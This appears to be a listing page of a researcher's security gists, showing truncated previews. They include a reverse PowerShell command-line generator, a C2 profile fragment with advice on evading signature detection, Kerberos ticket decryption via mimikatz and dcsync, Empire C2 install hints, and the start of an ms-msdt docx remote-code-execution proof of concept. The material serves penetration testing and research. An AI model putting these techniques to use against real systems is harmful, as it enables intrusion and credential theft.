| #!/usr/bin/env python3 | |
| # | |
| # detect whether the remote MSMQ service on 1801/tcp is enabled or not | |
| # by sending a valid message to the target | |
| # | |
| # resources: | |
| # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqmq/b7cc2590-a617-45df-b6a3-1f31102b36fb | |
| # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqqb/85498b96-f2c8-43b3-a108-c9d6269dc4af | |
| # |
| #!/usr/bin/env python3 | |
| # | |
| # generate reverse powershell cmdline with base64 encoded args | |
| # | |
| import sys | |
| import base64 | |
| def help(): | |
| print("USAGE: %s IP PORT" % sys.argv[0]) |
| # in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures) | |
| # as stage0, remote injecting a thread into a suspended process works | |
| set host_stage "false"; | |
| set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62"; | |
| set sleeptime "10000"; | |
| stage { | |
| set allocator "MapViewOfFile"; | |
| set name "notevil.dll"; |
Default installer scripts works for .deb based distros like Debian, Ubuntu and Kali and not for Arch Linux (pacman).
Here are some hints on installing Empire for ArchLinux. Base repo is here: https://github.com/BC-SECURITY/Empire
git clone --recursive https://github.com/BC-SECURITY/Empire.git
| #!/bin/bash | |
| # | |
| # openvpn2 wrapper for supporting Dynamic Challenge (in openvpn 2.x) | |
| # | |
| # Dynamic Challenge: | |
| # CRV1:<FLAGS>:<STATE_ID>:<BASE64_USERNAME>:<CHALLENGE_TEXT> | |
| # Dynamic Challenge response: | |
| # Username: [username decoded from challenge, probably equals to the original username] | |
| # Password: CRV1::<STATE_ID>::<RESPONSE_TEXT> |
| #!/usr/bin/env python3 | |
| # NOTE: this script was created for educational purposes to assist learning about kerberos tickets. | |
| # Likely to have a few bugs that cause it to fail to decrypt some TGT or Service tickets. | |
| # | |
| # Recommended Instructions: | |
| # Obtain valid kerberos tickets using Rubeus or mimikatz "sekurlsa::tickets /export" | |
| # Optionally convert tickets to ccache format using kekeo "misc::convert ccache <ticketName.kirbi>" | |
| # Obtain appropriate aes256 key using dcsync (krbtgt for TGT or usually target computer account for Service Ticket) | |
| # Run this script to decrypt: | |
| # ./decryptKerbTicket.py -k 5c7ee0b8f0ffeedbeefdeadbeeff1eefc7d313620feedbeefdeadbeefafd601e -t ./Administrator@TESTLAB.LOCAL_krbtgt~TESTLAB.LOCAL@TESTLAB.LOCAL.ccaches |
Short HOWTO about setting up Full Disk Encryption with unattended auto-unlock using TPM2 on Kali.
Useful for rogue devices (auto-connecting to C2), headless pentest boxes, etc. storing confidential information but lacking physical security.
NOTE: In order to maintain integrity and protect the encryption key, hardening the boot process with Secure Boot is a must. For making Secure Boot work (without messing up the default UEFI keys stored in the hardware), the Microsoft-signed UEFI shim loader is used (available in the Kali repo) which is able to load securely an arbitrary ELF image as 2nd stage
MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).
The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).
Here are the steps to build a Proof-of-Concept docx:
WARNING: tested only on my setup (LineageOS 18.1 on instantnoodle), other setups may break and brick the device!
Step-by-step instructions (for reinstalling patched boot.img for Magisk):
| #!/bin/bash | |
| # | |
| # patch ramdisk.img (for installing Magisk on x64 Android emulator) | |
| # | |
| # x86_64 on Android 12 (API Level 32) is supported/tested currently | |
| # | |
| # install AVD: | |
| # | |
| # sudo sdkmanager 'system-images;android-32;google_apis_playstore;x86_64' |